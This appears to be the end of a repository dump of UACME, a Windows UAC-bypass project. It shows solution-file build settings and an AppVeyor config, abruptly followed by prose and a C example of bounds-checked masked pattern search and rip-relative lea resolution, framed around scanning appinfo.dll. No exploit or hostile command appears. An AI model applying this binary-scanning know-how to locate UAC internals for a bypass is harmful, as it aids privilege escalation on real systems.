		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|Win32.ActiveCfg = Debug|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.ActiveCfg = Debug|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.Build.0 = Debug|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.ActiveCfg = Debug|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.Build.0 = Debug|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.ActiveCfg = Debug|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.Build.0 = Debug|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|Win32.ActiveCfg = Release|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.ActiveCfg = Release|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.Build.0 = Release|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64
		{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|Win32.ActiveCfg = Debug|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.ActiveCfg = Debug|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.Build.0 = Debug|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.ActiveCfg = Debug|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.Build.0 = Debug|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.ActiveCfg = Debug|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.Build.0 = Debug|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|Win32.ActiveCfg = Release|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.ActiveCfg = Release|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.Build.0 = Release|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64
		{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(NestedProjects) = preSolution
		{23A2E629-DC9D-46EA-8B5A-F1D60566EA09} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}
		{3BEF8A16-981F-4C65-8AE7-C612B46BE446} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}
		{07EF7652-1C2D-478B-BB4B-F9560695A387} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}
		{45D748AC-9B16-426E-808D-94662B0417F7} = {49552A73-F1A4-44FA-94C0-5CDD84F48717}
		{876F1157-B68F-4D0A-B963-6157B266DDE5} = {49552A73-F1A4-44FA-94C0-5CDD84F48717}
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {34101EC9-C266-4BF6-AC89-898FF5B54501}
	EndGlobalSection
EndGlobal

================================================
FILE: appveyor.yml
================================================
version: 1.0.{build}
branches:
  only:
    - master
image: Visual Studio 2022
configuration: Release
platform: x64
clone_folder: c:\projects\uacme
build_script:
  - cmd: msbuild Source\uacme.sln /m /v:normal /p:Configuration=Release /p:Platform=x64 /p:PlatformToolset=v143
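supFindPattern in Source/Yuubari/sup.c above anchors on Pattern[0] with memchr and re-checks the remaining length before every memcmp, which is what keeps a scan of a mapped image from reading past the end of the buffer. As an added example that is not part of UACME, here is the same search generalized to a masked pattern (bytes that must match beside wildcard bytes), which is what a scanner needs when the instruction it looks for carries a displacement that differs between builds, together with a helper that turns a located rip-relative lea into the RVA it references. The sample bytes, pattern, mask and every name below are constructed for this demo and are not taken from any real appinfo.dll.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Masked byte search. mask == NULL means every pattern byte is fixed (the
 * page's supFindPattern case); otherwise mask[i] == 0 marks a wildcard byte.
 * Returns a pointer into buf, or NULL. Never reads past buf + bufSize. */
const uint8_t *find_masked_pattern(const uint8_t *buf, size_t bufSize,
                                   const uint8_t *pat, const uint8_t *mask, size_t patSize)
{
    if (buf == NULL || pat == NULL || patSize == 0 || bufSize < patSize)
        return NULL;

    /* Index of the first fixed byte: memchr jumps straight to its candidates,
     * the same trick supFindPattern uses with Pattern[0]. */
    size_t first = 0;
    while (first < patSize && mask != NULL && mask[first] == 0)
        first++;

    const uint8_t *last = buf + (bufSize - patSize);  /* last start where the pattern still fits */
    for (const uint8_t *p = buf; p <= last; p++) {
        if (first < patSize) {
            const uint8_t *hit = memchr(p + first, pat[first], (size_t)(last - p) + 1);
            if (hit == NULL)
                return NULL;
            p = hit - first;
        }
        size_t i = 0;
        while (i < patSize && ((mask != NULL && mask[i] == 0) || p[i] == pat[i]))
            i++;
        if (i == patSize)
            return p;
    }
    return NULL;
}

/* Offset form of the search, easier to assert on: -1 when not found. */
long find_masked_offset(const uint8_t *buf, size_t bufSize,
                        const uint8_t *pat, const uint8_t *mask, size_t patSize)
{
    const uint8_t *hit = find_masked_pattern(buf, bufSize, pat, mask, patSize);
    return hit ? (long)(hit - buf) : -1;
}

/* For a 7-byte `lea reg, [rip+disp32]` at instrOffset, return the RVA it
 * references: offset of the next instruction plus the signed displacement.
 * -1 when the instruction would not fit inside the buffer. */
long lea_rip_target_rva(const uint8_t *buf, size_t bufSize, long instrOffset)
{
    if (instrOffset < 0 || (size_t)instrOffset + 7 > bufSize)
        return -1;
    int32_t disp;
    memcpy(&disp, buf + instrOffset + 3, sizeof(disp));
    return instrOffset + 7 + disp;
}

/* Constructed sample "code": a lea rax, then a lea rcx with a 16-byte forward
 * displacement, then ret. Not bytes from any real binary. */
static const uint8_t SAMPLE_CODE[] = {
    0x90,                                      /* nop                        offset 0  */
    0x48, 0x8D, 0x05, 0x11, 0x22, 0x33, 0x44,  /* lea rax, [rip+0x44332211]  offset 1  */
    0x48, 0x8D, 0x0D, 0x10, 0x00, 0x00, 0x00,  /* lea rcx, [rip+0x10]        offset 8  */
    0xC3                                       /* ret                        offset 15 */
};
#define SAMPLE_CODE_SIZE sizeof(SAMPLE_CODE)

/* lea rcx, [rip+?] with the displacement wildcarded. */
static const uint8_t LEA_RCX_RIP[]  = { 0x48, 0x8D, 0x0D, 0x00, 0x00, 0x00, 0x00 };
static const uint8_t LEA_RCX_MASK[] = { 1, 1, 1, 0, 0, 0, 0 };

/* Edge-case patterns: one ending exactly at the buffer end, one that would
 * straddle the end, and one whose first byte is a wildcard. */
static const uint8_t TAIL_PAT[]     = { 0x00, 0xC3 };
static const uint8_t STRADDLE_PAT[] = { 0xC3, 0x00 };
static const uint8_t WILD_PAT[]     = { 0x00, 0x8D };
static const uint8_t WILD_MASK[]    = { 0, 1 };

int main(void)
{
    long off = find_masked_offset(SAMPLE_CODE, SAMPLE_CODE_SIZE,
                                  LEA_RCX_RIP, LEA_RCX_MASK, sizeof(LEA_RCX_RIP));
    printf("lea rcx found at offset %ld, references RVA %ld\n",
           off, lea_rip_target_rva(SAMPLE_CODE, SAMPLE_CODE_SIZE, off));
    printf("pattern at buffer end: %ld, pattern past buffer end: %ld\n",
           find_masked_offset(SAMPLE_CODE, SAMPLE_CODE_SIZE, TAIL_PAT, NULL, sizeof(TAIL_PAT)),
           find_masked_offset(SAMPLE_CODE, SAMPLE_CODE_SIZE, STRADDLE_PAT, NULL, sizeof(STRADDLE_PAT)));
    return 0;
}
```

The `last` pointer is computed once from bufSize minus patSize, so both the memchr window and the byte-by-byte compare are bounded by construction; a match that ends exactly at the buffer end is found, and a pattern whose first byte sits at the final position is rejected without ever touching memory beyond the buffer.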